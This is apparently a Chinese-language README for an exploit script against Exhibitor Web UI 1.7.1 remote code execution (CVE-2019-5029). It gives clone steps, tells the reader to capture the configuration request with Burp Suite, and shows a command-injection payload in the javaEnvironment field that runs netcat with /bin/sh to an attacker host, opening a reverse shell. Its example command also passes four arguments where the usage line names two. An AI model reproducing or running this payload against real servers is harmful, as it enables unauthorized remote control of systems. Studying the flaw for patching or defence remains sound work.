
Exhibitor Web Ui 1.7.1 远程代码执行(RCE),CVE-2019-5029
$ git clone https://github.com/thehunt1s0n/Exihibitor-RCE/
$ cd Exihibitor-RCE/
你可能需要编辑脚本中的 JSON 数据载荷。为此,只需在 exihibitor 的配置选项卡中提交更改时,使用 Burp Suite 捕获请求,然后将其复制粘贴到脚本中的 curl 命令里即可。
请确保按如下方式更改 javaEnvironment:
"javaEnvironment":"$(/bin/nc -e /bin/sh '$ATTACKER_HOST' '$ATTACKER_PORT' &)"
./exploit.sh <attacker_host> <attacker_port>
示例:
$ ./exploit.sh 192.168.197.98 8080 192.168.45.187 8080
